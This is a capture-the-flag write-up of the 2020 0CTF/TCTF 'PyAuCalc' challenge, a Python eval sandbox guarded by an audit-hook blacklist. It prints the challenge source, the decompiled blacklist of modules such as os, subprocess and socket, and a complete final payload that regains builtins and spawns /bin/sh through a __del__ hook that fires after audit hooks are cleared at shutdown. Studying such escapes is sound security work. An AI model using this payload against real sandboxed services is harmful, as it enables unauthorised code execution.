[0CTF/TCTF qualifiers 2020] PyAuCalc

This post originally appeared on the flagbot site, feel free to read it there. It is presented here as a form of archival and to collect all my posts in one place.

Robin Jadoul

Jun 29, 2020

0CTF/TCTF, organizers, python, pyjail

In this challenge, we’re looking at a modern type of pyjail escape. Upon first connecting, we’re informed about the source code of the challenge being available, so we can have a look at that first.

#!/usr/bin/env python3

import pathlib
import re
import signal
import sys

import audit_sandbox

if sys.version_info[:3] < (3, 8, 2):
    raise RuntimeError('Python version too old')

WELCOME = f'''\
Welcome to PyAuCalc, an awesome calculator based on Python {'.'.join(map(str, sys.version_info[:3]))}!
(Type "source" to see my awesome source code!)
'''
SOURCE = pathlib.Path(__file__).read_text(encoding='utf-8')
SANDBOX = pathlib.Path(audit_sandbox.__file__).read_bytes()

# Calculators don't need hacking functions, ban them!
audit_sandbox.install_hook()
del audit_sandbox
del sys.modules['audit_sandbox']


def main():
    print(WELCOME)

    while True:
        try:
            expression = input('>>> ')
            # Calculators don't need non-ASCII characters.
            expression.encode('ascii')
        except EOFError:
            break
        except Exception:
            print('invalid expression')
            continue

        # No denial-of-service!
        signal.alarm(1)

        # Calculators don't need spaces.
        if not (expression := re.sub(r'\s', '', expression)):
            signal.alarm(0)
            continue

        # Feel free to inspect my super secure source code and sandbox!
        if expression == 'source':
            signal.alarm(0)
            print(SOURCE)
            continue
        if expression == 'sandbox':
            signal.alarm(0)
            print(SANDBOX)
            continue

        try:
            # Calculators don't need builtins!
            result = str(eval(expression, {'__builtins__': {}}))
            signal.alarm(0)
            print(result)
        except Exception:
            signal.alarm(0)
            print('invalid expression')


if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        sys.exit(0)

So we see that our input will be used in an eval, without direct access to builtins, with only ascii characters, and with all spaces removed. And there’s some sandboxing/auditing going on through another module. As we can apparently also download that, let’s go ahead and inspect it.

After downloading the sandbox and converting it to a proper file, we can see that it’s a python extension module. A quick trace through the module being constructed shows us the install_hook function simply uses PySys_AddAuditHook to install an audit hook. This audit hook checks every audit against a blacklist of components, and when kills the process when the blacklist is matched.

int hook(char *event,void *args,void *userdata) {
  int iVar1;
  char *pcVar2;
  char *__s1;
  undefined **ppuVar3;
  char *__s;
  long in_FS_OFFSET;
  char *pcStack72;
  long local_40;
  
  local_40 = *(long *)(in_FS_OFFSET + 0x28);
  pcVar2 = strdup(event);
  __s = pcVar2;
  if (pcVar2 == (char *)0x0) {
    fwrite("Insufficient memory.\n",1,0x15,stderr);
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  do {
    __s1 = strtok_r(__s,".",&pcStack72);
    if (__s1 == (char *)0x0) {
      FUN_001010e0(pcVar2);
      if (local_40 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
        __stack_chk_fail();
      }
      return 0;
    }
    ppuVar3 = &blacklist;
    __s = "breakpoint";
    while( true ) {
      iVar1 = strcmp(__s1,__s);
      if (iVar1 == 0) {
        puts("Hacking attempt!");
        FUN_001010e0(pcVar2);
                    /* WARNING: Subroutine does not return */
        exit(1);
      }
      __s = (char *)0x0;
      if ((Elf64_Dyn *)ppuVar3 == _DYNAMIC) break;
      __s = (char *)((Elf64_Dyn *)ppuVar3)->d_tag;
      ppuVar3 = (undefined **)&((Elf64_Dyn *)ppuVar3)->d_val;
    }
  } while( true );
}

Enumerating the blacklist, we find the following event components are disallowed:

ctypes
fcntl
ftplib
glob
imaplib
import
mmap
msvcrt
nntplib
open
os
pdb
poplib
pty
resource
shutil
smtplib
socket
sqlite3
subprocess
syslog
telnetlib
tempfile
urllib
webbrowser
winreg

So it seems any file access, code execution and importing of modules not yet in sys.modules will result in the interpreter being stopped. From here, we see two possible ways forward: circumvent the audit events, or exploit the python interpreter so that we gain native code execution that can do these things without going through the python interpreter code that emits these events.

Let’s first build up some utility tools. Since we’re in an eval environment and not exec, we’d ordinarily have to turn to immediately executed lambdas to have some kind of convenience naming for our variables, which would be impossible since we can’t construct a lambda without using spaces. Since we’re in a recent python version however, we can use the walrus operator := instead. Our payload can take the form of a list, and e.g. [a:=21,a*2] as payload confirms we can have variable names now. Then the classic pyjail techniques apply to get to existing modules and classes. In particular, we get to the class _frozen_importlib.BuiltinImporter so that we can load the builtins module to regain access to the builtins, including __import__ which we can still use for modules already in sys.modules. The first element in our payload list will become y := ().__class__.__base__.__subclasses__()[84]().load_module('builtins'). We can see the alarm call in the given source, so we disable it already, in case we want more time at some point: y.__import__('signal').alarm(0). One last trick we need is getting around some restrictions with spaces and eval: exec is a function available through builtins, and we can encode spaces in a string as \x20, meaning we can now get even more arbitrary python code running by using y.exec("something\x20here",{"__builtins__":y.__dict__}).

With some google searching, we easily found a blog post discussing how to work around the audit hooks with the usage of ctypes, which is unfortunately not available in sys.modules, besides its audit events being blacklisted as well.

At this point, we spent a fairly large amount of time manually tracing through calls in the cpython source code hoping to find a code path that could give us a file read or exec without triggering an unwanted audit event (what we didn’t know then was that file read was not even enough to get the flag; we need full RCE). We found one interesting possibility: _posixsubprocess.fork_exec seems to fork and exec without dispatching an audit event. But alas, that module couldn’t be accessed either. While it’s a builtin module and as such doesn’t need any open events, the import events it triggers when trying to import it are also blocked.

After some needed sleep and with a fresh head, we set off to try again. Going through the source code, we had noticed that the only way to completely remove hooks is when _PySys_ClearAuditHooks is called, which is obviously not directly available to our running python code, and only gets called during interpreter shutdown. Then inspiration struck: we could hook python code to run at some event during shutdown after the hooks were cleared. Looking at the cpython source code again, there were two clear options:

// From https://github.com/python/cpython/blob/v3.8.3/Python/pylifecycle.c#L1232
_PySys_ClearAuditHooks();

/* Destroy all modules */
PyImport_Cleanup();

/* Print debug stats if any */
_PyEval_Fini();

/* Flush sys.stdout and sys.stderr (again, in case more was printed) */
if (flush_std_files() < 0) {
    status = -1;
}

After the audit hooks are cleared, modules are cleaned up, and sys.stdout and sys.stderr are flushed once more. The first attempt, to overwrite sys.stderr with a custom object with a flush method failed locally already (though I’m not sure why). So we look at the modules instead. We want to try to inject something into sys.modules that can do something when it gets “cleaned up”. Luckily for us, there’s the magic method __del__, which is triggered when an object is being garbage collected. We create our own class and object, inject it into sys.modules and wait for the interpreter to clean up the modules upon shutdown.

import os,sys
class X:
    def __del__(self):
        os.system("/bin/sh")
sys.modules["pwnd"] = X()
sys.exit()

Encoding this as a string that doesn’t contain any spaces and our exec trick, we get a shell. Then we just need to run /readflag to obtain the flag and be on our merry way. The flag turns out to be flag{bytecode_exploit_to_pwn_python_and_bypass_audit_hook_36c3879ea297210820301ce1}. Oops, it looks like we got an unintended solution there, and the intended approach was to get code execution and circumvent the interpreter instead.

So would our exploit be avoidable? Given that hooks are added by a module, it seems that the general case, the module being cleaned up only after the hook has been removed cannot be done the other way around, since the hook might rely on its module still existing.

Final payload

[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]